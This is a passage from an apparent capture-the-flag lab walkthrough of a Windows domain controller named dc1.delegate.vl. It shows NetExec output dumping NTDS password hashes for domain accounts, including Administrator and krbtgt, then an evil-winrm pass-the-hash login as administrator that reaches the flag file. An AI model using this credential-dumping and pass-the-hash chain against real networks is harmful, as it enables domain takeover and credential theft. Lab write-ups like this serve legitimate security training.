SMB         dc1.delegate.vl 445    DC1              Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
SMB         dc1.delegate.vl 445    DC1              Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         dc1.delegate.vl 445    DC1              krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
SMB         dc1.delegate.vl 445    DC1              A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
SMB         dc1.delegate.vl 445    DC1              b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
SMB         dc1.delegate.vl 445    DC1              R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
SMB         dc1.delegate.vl 445    DC1              J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
SMB         dc1.delegate.vl 445    DC1              N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
SMB         dc1.delegate.vl 445    DC1              DC1$:1000:aad3b435b51404eeaad3b435b51404ee:f7caf5a3e44bac110b9551edd1ddfa3c:::
SMB         dc1.delegate.vl 445    DC1              anurag$:4601:aad3b435b51404eeaad3b435b51404ee:68ae965c9062b389f2a285e27ff0a566:::
SMB         dc1.delegate.vl 445    DC1              [+] Dumped 10 NTDS hashes to /home/admin/.nxc/logs/ntds/dc1.delegate.vl_None_2026-01-12_104005.ntds of which 8 were added to the database
SMB         dc1.delegate.vl 445    DC1              [*] To extract only enabled accounts from the output file, run the following command: 
SMB         dc1.delegate.vl 445    DC1              [*] cat /home/admin/.nxc/logs/ntds/dc1.delegate.vl_None_2026-01-12_104005.ntds | grep -iv disabled | cut -d ':' -f1
SMB         dc1.delegate.vl 445    DC1              [*] grep -iv disabled /home/admin/.nxc/logs/ntds/dc1.delegate.vl_None_2026-01-12_104005.ntds | cut -d ':' -f1
admin@ip-172-31-25-116:~/delegate$ 

and with that we can get the shell

admin@ip-172-31-25-116:~/delegate$ evil-winrm -i dc1.delegate.vl -u administrator -H c32198ceab4cc695e65045562aa3ee93
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\Administrator\\Documents> dir ..\\Desktop

    Directory: C:\\Users\\Administrator\\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         1/12/2026   2:23 AM             34 root.txt

*Evil-WinRM* PS C:\\Users\\Administrator\\Documents>